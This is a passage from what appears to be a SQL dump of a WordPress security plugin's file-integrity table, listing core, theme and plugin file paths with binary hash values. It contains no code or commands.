gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�Vtc��3�G�G�','��o�#�ߗ|!\\A�L=Uހ��L��q�Y�p','',0,'?'),('��(��NL�; ��','wp-includes/js/dist/api-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�|��bM�h�H�}d','��\Z���r}��Z8���~n��z�5����:��','',0,'?'),('��?UB�w��N i�','wp-content/themes/twentynineteen/sass/navigation/_menu-footer-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f��p��4g����','�����x8o1������b��pr���p���','',0,'?'),('���F�Z�\nQ�CE','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/RetryMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yEp�iX��P\n�U�','�9x\r\Z��i)��N�Y�\'����l|�,���','',0,'?'),('���퇴���u��4�6','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�fk��<��\r\n��','R!�O]p�I\n��\\��VP�9�=��!�?���','',0,'?'),('��\r�m�s\0�@�=[�','wp-includes/blocks/text-columns/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F���Y�e `g���T',']�aE��\n0�X�B��Tl}X�k\"O˟���','',0,'?'),('��֬+I�7���^��','wp-includes/blocks/file/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c\Zi���:�vs��','���Q\rpoN�˃WCn�L�YG��=����*','',0,'?'),('�����A���V�f��','wp-content/plugins/wp-cerber/assets/flags/ug.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����h�UNJ}�','��;�T�W��m�� ����(Izҁ��h2','',0,'?'),('��R�p�x�O�U�\"','wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L-\Z���0vf\n�','�+&h-ʚ��j��FpR��$��ɩ 1#t','',0,'?'),('��\'�:s��\\��E3','wp-content/plugins/wordpress-seo/src/schema-templates/image.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lT�`xm=��in5�9','V�ғΛqk�hԩ�?W�k��\\A~��IK','',0,'?'),('�X�VטO|8}���','wp-includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"Z���y_x��','�ˋ��E}\\2���j�QP1�É�\'1���C�G&','',0,'?'),('�$�{�]�K��� ','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ka.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �&JT�?UF�����','$��&��x/&�kit�}rP�~���N���@','',0,'?'),('�.�XvQa�*C��eN','wp-content/plugins/wp-cerber/assets/flags/ph.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','06zD\'�w��� �','����?�ͺ�mV�yi�z2 �BC� m�jX��','',0,'?'),('�<�,���!t�^��','wp-content/uploads/2019/08/health2-350x220.jpg',0,'�0�kq\0 І���','�0�kq\0 І���','��h\\+O�ܩa���f�\0U��x\n�{̦���','',0,'?'),('�B�H*mz��N83��','wp-admin/css/edit-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�nV*)oQ�$F��ő','g���7�OD�{�9d�v̓�]��','',0,'?'),('�V}�P���m�/�|I*�','wp-includes/js/customize-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�6��!��҃z��','�G?~�D�,(�F]�I�bNE��pc�v:���z','',0,'?'),('�l��t:{0+7�9C�','wp-includes/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Hx+�07��`�}�','@qz�j�I���� \0D�a�W��6n�{���y�','',0,'?'),('��.��v8-rJŕ�qQ','wp-includes/js/wp-auth-check.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2���YT�x�w�','E�ID(10i�|�V:��^�s\ZXǂ\\�9k�O�G','',0,'?'),('��O�����9X�KHo�','wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+Hs��x���PL�Q�','�^���\Z�7�T��\r�s���*��=�\"F�r\0G','',0,'?'),('��6��U�Ѧ�u�','wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3n9L�P����u��d��','��c�C8\0ы#\"����#�T��\rXas{A�','',0,'?'),('����-�I�u�!','wp-content/themes/vega/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ŀӻ�%��s- 콳','��A\rE5e��zPY��.t�0��%�ۂ��\\\"','',0,'?'),('��7��E#�wŧj���','wp-admin/includes/image-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�a�uN��r�E�','�ῦ�$�2���\'s��R��\\^}|�#hi�7d�','',0,'?'),('����bq�/���F�k','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7��¤\r�F��g','�n�V\'�V����V�)F|*ᑝ2�N��z','',0,'?'),('��=�N} ���X��y','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/InvalidArgumentException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0TY&�d_hQ���]','gdf�i�C����������������ǚ','',0,'?'),('��v��|�-��','wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�<�]��r�','���p[�����L7F��|˖ZB�R�','',0,'?'),('�h�6���xڮh�k�','wp-content/uploads/2019/08/health2-300x200.jpg',0,'�~�*n;H��U�e12�','�~�*n;H��U�e12�','L�3���\0��Sq�5�^���T��3�C��','',0,'?'),('�!HUN&�\"����z��','wp-admin/css/widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0Z?eq����D�x�1','�l���^p0̝X\'tGM[��\Z\r�JQ�\rh','',0,'?'),('�&?R2 XP..\"�6F','wp-content/plugins/wordpress-seo/src/loggers/logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�2���/=���','�XP����F�\'\\�<��#��O�:�&&}���.w�','',0,'?'),('�*�5uj���p��','wp-content/plugins/wordpress-seo/src/conditionals/wp-robots-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��\"i)%�l\r�\"���]','�Z���������{� �\Z�iUR�E\\�','',0,'?'),('�F߇���#��ata�','wp-includes/block-patterns/query-small-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vj*�R�F�;Q�<�','���n��/�L�^�w�n����CN��~�*�� ','',0,'?'),('�L��~iS?�v�C>�@y','wp-includes/blocks/latest-comments/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���R}K�V��=�u�','�JaSG4���gL���j.�Ϋ�L#DX�,s�','',0,'?'),('�S7��zǫ�W�~�2�','wp-includes/blocks/site-tagline/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',=��SPE��ҧ��','ʈ� �ؿߥ��~��E��k��,f����f�R','',0,'?'),('�T�٧r��\0����','wp-content/plugins/wordpress-seo/admin/class-schema-person-upgrade-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���y\0t2G�>��z','�2;� �IPqkAQz�m6�1�R��ŏ�ph�','',0,'?'),('�a�tU�q�^!�0ƣl�','wp-includes/post-formats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�%�J|,%Fś@','��6�x��q�#�\n��[j��E��9�9e�^Q','',0,'?'),('�e��P�-�+�T�;ğ�','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/webmaster-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2_aȊ�B<$�L`��x','�~���\n�d,����E�+:� ��w\r&�','',0,'?'),('�k���zߣ����bo�R','wp-admin/post-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I\n(��ḑ���{z','�T�Ѷ�����Lc���4�O���oFd���d','',0,'?'),('�u�\n&fm���q�C�','wp-content/plugins/wordpress-seo/src/builders/indexable-date-archive-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yg��^h)��ť�r','X�YX�ʏ��^D7��-�$�_w����h�','',0,'?'),('�vO��#�J�N��+쁁','wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('�|v�P��0�fh�T�','wp-includes/js/dist/block-directory.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z���N�3^',')sp��&7c�/�fw\r���9���','',0,'?'),('��@��{�J��5䷴X','wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U,�:)��؋\"�QqY','\"�Oo�ۈ���<��oES-MO÷�YN�!��','',0,'?'),('��w�h��M�M0��^�','wp-content/plugins/redirection/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F*d��~Ȫ,�CX�','�x�Zy�\Z$�e�D)�n�9�U}�k�,�\'�\Zy','',0,'?'),('����V�h��G�!�j\'','wp-content/plugins/wp-cerber/assets/flags/jm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b��F/�+�d9','\n�Ƽ�H�_���T�T�2�[�_��ox�u�','',0,'?'),('�����9O/���1\n�','wp-content/uploads/2016/11/interior-design-150x150.jpg',0,'G�c��L����E�Re)','G�c��L����E�Re)','�f��wd��^@��|<����t�xvbx`C`�p�','',0,'?'),('����L��6 ��׳','wp-includes/ID3/module.audio.ac3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>Y����\Zk0�aM','�b��^#��¨(t�^�rߘz���9�F���','',0,'?'),('��h�~� 6Z\"�','wp-content/plugins/wordpress-seo/css/dist/search-appearance-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#Wr��â�wQ�R�U','�*�b�����x\"΄�Q��p[�D���^�aӷ','',0,'?'),('��T��V���\\��','wp-admin/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�֒��y�DБ�#�','L��)Ӊ�\"�.4l��N�U�7�+#��R}���','',0,'?'),('�ͫ5��>]������t','wp-content/plugins/wordpress-seo/src/models/indexable-extension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[��|\0�$�3��1l0','��Q�<�.��0]�Zk�:�:/�m�����','',0,'?'),('���Nt�K�U��','wp-includes/Requests/Exception/HTTP/407.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qx+�D.42\0����','>\Z���]ƚ�B̏Xv�ذc����.N2�NҹЯ','',0,'?'),('�ܵ[Ҳm%�6�S8:D','wp-includes/images/toggle-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��·�a��;�d��*�','[b\Z���;�]�f�0���s|:�����%','',0,'?'),('���+��;�~tIQ�','wp-content/plugins/wordpress-seo/css/dist/score_icon-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xac�49y�VM��ޯ','kA�T�flA�RM�X�7ݿ~.�We�lS���','',0,'?'),('��!ެ��߳���p','wp-includes/images/crystal/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�>)*/��!�-�','���n$���_�u �$Q3��E�r�|Jm�','',0,'?'),('���#�V(k]$����(','wp-content/themes/twentynineteen/sass/elements/_tables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�\"MY���~��','�lG����w��}V���>��%{n��\\�z��;�','',0,'?'),('����O�@W���p��S','wp-content/languages/admin-en_GB.po',0,'��\\D�%�p &�j�\n','��\\D�%�p &�j�\n','�u�@�苯�sk��I��Wc\Z ��7Q�CŁ','',0,'?'),('���I 2�R�NjY��','wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�\rs*�\\�','��O�Z=�<�3S�t�Q����_�u;� m8','',0,'?'),('�&�M�X��W��O�','wp-includes/error-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?5�p��.9�;F�ܧ�','֦ �7S�\Z�\\��cdLb|o�1��Y�ã��:','',0,'?'),('� � n�@شu�]�w','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/eu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\��, �\n����DP','�71\0��4ގ$�h��\0��q���n�0Na�','',0,'?'),('�5Y\'�ڀ���`��ѫ','wp-content/plugins/wordpress-seo/src/conditionals/admin/post-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�6`�8U��-','�p�qb,��D������.:��s1ȥ�','',0,'?'),('�C�Ƈtdf�T�c/�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ps.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8ߤz����Z3=q\Z�y','x���$,B���[ �r_��q��K^��\n','',0,'?'),('�S�b�eL��','wp-content/plugins/wp-cerber/assets/flags/be.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YZx��ʭ��T�/� �','4�nMM��e)��<�Ia�P�1�K�~#`G','',0,'?'),('�\\Д��h��c��','wp-includes/blocks/page-list/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��i�y��\rS��&g�','����`��j�]�q�\\ј��9�~t?�E���','',0,'?'),('�a�<�d��Q�8���','wp-content/plugins/wordpress-seo/admin/class-bulk-editor-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\0�NZ��j�ڤ�뇾','���\0�e�Mn����E_xv�B�ց|�N/�','',0,'?'),('�h�����FuQe� �','wp-includes/images/wlw/wp-comments.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6]P����.s���','�zl\Z��C��D���#�a�N��3\'XZ�','',0,'?'),('�o���4���f?$�','wp-content/plugins/wordpress-seo/src/conditionals/admin/posts-overview-or-ajax-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ָ�DU�~��C�8�','��f�Y{�FY&c��;�k���+�<�{��� �','',0,'?'),('�u1HM:E7/�{�','wp-admin/includes/class-wp-site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�>��ȯX)�','(��TӠC�ϲ�ێ��ܾﯖ����g�','',0,'?'),('��ZԬ=!Ri=�7�h�','wp-includes/js/dist/vendor/wp-polyfill-object-fit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w$�1)x5)L��{p','�Ljv��㡴y\"0�Mp�@���R�Tඒ�K�','',0,'?'),('��6y�a51�R�*�\'|','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/MessageFormatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#6�\Z;�z�T�<r','I�\'��n�~BE�!%#9�� )tk;����U}�*','',0,'?'),('��H����|��5���H','wp-content/plugins/redirection/locale/json/redirection-el.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r���C�,�Fۊ+','n,�+i\Z�2��&c6BnOӵ�pFo�N2�x�|}','',0,'?'),('���q�JGq�[RD�Ġ�','wp-content/uploads/2019/08/homeimprovements-150x150.jpg',0,'�^N(�\".g�@�N�a','�^N(�\".g�@�N�a','�Z�2S4pپv�|ёLg\0 ~#c&[�,u�','',0,'?'),('��1�@j��w}�üJaX','wp-content/plugins/wordpress-seo/inc/class-wpseo-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��Ϩ@\Z�Xf8D��','T�I�n����4qKN�)^��� �a�\Z��|-!','',0,'?'),('��N*yVy�Q�Qj§,C','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Light.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Gd1ȓX*_j%\r��','�I�XS��>;]^�q�3��\"`���d�5�9��','',0,'?'),('�ǀ3�<��&��YĆ','wp-includes/class-wp-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?T�v���|U�y','?}]�����b4\0����J�� ��5�.��1U','',0,'?'),('��f0��ͭ��~�)','wp-includes/fonts/dashicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�_rY+ʂ;�','��yU�]f��8���t�����l�L.','',0,'?'),('��.�IOI�P��%�)','wp-includes/Requests/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M������/����','ɯO3e���F��㛆��v+����.r/�>�,','',0,'?'),('��MO,���s���\r��','wp-includes/class-wp-http-encoding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Usg2eޫj9�EA����','t��1��XZ��C�9��c��x](D[9��O�','',0,'?'),('��+�c;����55�','wp-content/plugins/redirection/database/database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s*��J�Jֆ�[o���','�A��,�v21� 3hZ\n�6~�$՛b�N','',0,'?'),('�|�aV��~�[f��.','wp-content/themes/twentynineteen/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��]��mu��N�\"_','���hLc�+�P�{����Zؑw�4�I��M','',0,'?'),('��z��J/�B&C�%','wp-includes/blocks/post-featured-image/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�f�|�����&','!/hj���YqO��k<w��i^pǫ�5\\ȈVJ�(\n','',0,'?'),('�!ۅ.�4��qdtP��','wp-content/plugins/akismet/views/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{ETJ�_q���n���','·^\n�b��q<v`x��K���Z�W��>�Gw��','',0,'?'),('�#ynہ彐[hr\\�U','wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@����{�Թ6','�دh\Z�o�>���:즱�l� 5D�_�\'-�w','',0,'?'),('�,>!�:e���[\"','wp-content/plugins/redirection/models/log/log-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��{t��|,Y�su(','B�V�OOP�#?�i���v�8�V�e\\{�-���','',0,'?'),('�5��;T��]��\0�','wp-includes/blocks/post-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����OQ���R��','s��2㼶�@��u�C\'��<z��|�c��V','',0,'?'),('�6�|;�;8�Q�4�k��','wp-admin/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�^|1��ޭ�a��9 ','@��,�����o�G�ARԊe�\n�\Z���1�=','',0,'?'),('�9�e�E��bݾl�3�','wp-includes/js/wp-lists.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p�Z�\ZF�\\�~¥','d��vWV��<rڍN�3z*�����7��','',0,'?'),('�A3�Wqh\Z&F�r ���','wp-content/uploads/2019/02/household-rubbish-150x150.jpg',0,'�C�V��[�{4q\"@','�C�V��[�{4q\"@','ytQ4������݈���6K8���#�V&g��','',0,'?'),('�W��f�0�\n�D �/\'','wp-content/plugins/wp-cerber/assets/flags/km.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%������&\'z���V',';��NS6����:����݇�u͙�r�x� ','',0,'?'),('�s�6Z��$Ӿy��D(','wp-includes/blocks/group/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=>���*��f��[���','ϩ���z��J&�O{|K�^�֤�0.�1t','',0,'?'),('�z9� �`�d3�\0�Iay','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �@��^����8J','��ؽ�@��B-K���m���-Ȼ��\Z�2p','',0,'?'),('�|�&\Z�i��zMm`�\'','wp-content/themes/vega/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)�`��7Z�@^-_�','z�R�v���+3�Q���r\'P�.7E�;�L�z','',0,'?'),('���*r%Y�3/�hN�p','wp-content/plugins/wp-cerber/assets/flags/sb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�5J��䈒?Qo�<','����T� k��w#�����Af�3A2�͂M','',0,'?'),('��\Z5o��#R\'/��l','wp-includes/fonts/dashicons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N\Z>w���@�R-/Y�','B\nZ\Z��_p�n͂��Q?/�\r3s�}���)','',0,'?'),('��w�#�Q������','wp-content/plugins/akismet/views/predefined.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#>ajϬa�����4�','�w�s��bN}�qY��7zo�U��u�\'���1','',0,'?'),('���{�RDC�~�����','wp-content/plugins/redirection/redirection.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{Y|��c������','���o�;�Q�#�*�S��{Í�\09�6�ǽ','',0,'?'),('����E�?��Юᾠ','wp-includes/js/media-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ٰkK��\\���R','�hXf���3t��RS<;��f&6]2쒗���+�','',0,'?'),('� �v����bu)','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�r����]��/�','yus���Կ�����:�\0)�y�zs�ݿSkH�','',0,'?'),('���R:^�e+x2��c','wp-includes/PHPMailer/SMTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӂ�\'�;R����<?','\n:P�(\ZAU�ٵ�< ���pe\0��W��o/b�','',0,'?'),('��Y\Zx�[k2��d','wp-content/plugins/wordpress-seo/src/conditionals/third-party/w3-total-cache-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X҂���_�HSkH�h','�]�c!���Pa��yc�`�)�G�Qb\'A\r��','',0,'?'),('��GKНt��\0~�b','wp-content/uploads/2019/08/Case-study-350x220.jpg',0,'}�B�*y�D�qA���','}�B�*y�D�qA���','2��E���u�I&�J�|�cAE��k��;�w','',0,'?'),('�ש��D��E��i_�','wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-already-installed-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o>�M�GѢet�','�3⽇XV�?�$�&��3b�⛚�����¡','',0,'?'),('��WD�$7��w3��S��','wp-content/plugins/wordpress-seo/src/conditionals/third-party/elementor-activated-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ը�.�&�D���','�\0{�\ZY�$��\"7%z��9�㟧��l!�','',0,'?'),('��Cg����}|�E��','wp-admin/js/word-count.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)�\r�]�X0�h5�\n�','�\\DE����lV�����Hk��\\N�A3���','',0,'?'),('�����/_���H�y','wp-content/plugins/wordpress-seo/src/schema-templates/cooking-time.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�a���=\nq�m�\'�pd','b�\Z���\r�?`��\"�,��pŕb<��h�&,No*','',0,'?'),('��u�E�z���#d��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/MultipartStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D٧�5)\'�����j��','�_��w$0 ��5&��leP�\n�5,�8亪֡','',0,'?'),('� v�O.�|ߤҵ�','wp-includes/js/tinymce/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�����x:�`����','Y��#wO�g^\'�b��:�^� =跨|��','',0,'?'),('�L<Q��(��_g ��','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ResettableContainerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e).7:�4�]7�]�\"J�','��N�����qbG�x�<�B��\'\n}�Z���','',0,'?'),('�*\0�U\'-,�M�','wp-content/themes/twentynineteen/inc/template-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=#kQ\n�z��C','�uC���#ďAUf{Kb�|�\ZIl�L���٩','',0,'?'),('�>ܢ�Ӱ�\Z1���=C�','wp-content/plugins/wordpress-seo/src/presenters/canonical-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�c�P�̍�zFx�','�UХ�W���_>s�1��9za��c��>','',0,'?'),('�C�Q%��@ �Ja �','wp-includes/blocks/archives/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�՜VH����Zf��','4!\0�}!�;9o�l�_�l�4��f��L��V�l','',0,'?'),('�J5a�[�f1�s\\��','wp-content/plugins/wordpress-seo/admin/class-admin-media-purge-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g� M����>>B','��X�`h�����H2��sE�x�μ��K��ua','',0,'?'),('�Lߨ�Ϥ�(��R�','wp-admin/css/code-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gq���i�s�픋-','�~:\"�`�he&@��*����A�����','',0,'?'),('�jHE�4��5�wn','wp-content/plugins/wordpress-seo/src/generators/open-graph-locale-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����l�-Ys+o','�?�#� ��.c4�Sסo��5!�jgt�|\\\\�','',0,'?'),('�k�|DD��*@4�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nAgv��1P�ص','����0o*\r��vA�o�3���:��j�u���y','',0,'?'),('�q�z;��(.���L+','wp-content/plugins/wordpress-seo/languages/wordpress-seo-en_GB.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OM�ٚ�-SΒ�nA�','hK�9�`OɦN4�B\n�lU�s�K�#�y�5��','',0,'?'),('���l�hm��fsa�\Z','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/ProviderRedirectTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�R,^c�\rd�n��V�','_��?��\0z~���A���A��2Q,����Z��','',0,'?'),('��6��:�$4�-Tg5','wp-content/themes/twentynineteen/sass/elements/_lists.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�� ���L`B[','���V\"��\ZkY�cnUkYY$-,��y�\r�','',0,'?'),('��p��K�b��\0!�(��','wp-includes/css/dist/block-directory/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�諸��ؠc�l�','��R\r��<B��w<u��\r$$��Ÿa@c�T','',0,'?'),('������L���U�2u�','wp-content/plugins/wordpress-seo/src/deprecated/admin/endpoints/class-endpoint-ryte.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�G�`��v��31%','�1j����\0Hϳ�jd[�(��� �x`y���','',0,'?'),('��T1��Г�����','wp-content/plugins/wordpress-seo/src/integrations/admin/link-count-columns-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(I�lG9J���U�m','� ��O��!������N��/O�۩ �Ǹ�','',0,'?'),('������n������','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�~]r�M�ͪ(vu','Yz�Ж�4�/h^DϚ���� �؞�@��&','',0,'?'),('��hxh�M*����S�','wp-content/plugins/wp-cerber/assets/flags/bn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C.M��sg:��','s�@�Zd}���x���-r���^�x8Z.���','',0,'?'),('���!���Ow鏆','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sr-Cyrl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��L|�\r���E��','M�@LH��?(�zKrV6�\n?��V��fMX�o\"�','',0,'?'),('��|�~�������','wp-includes/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')6��):�������','H0��L�ї?�㞹�.1�M�Ie��٣�','',0,'?'),('��b�������|e~�','wp-admin/css/customize-widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���T��{�:4%��','k���V>��,�@f\r,t�~� 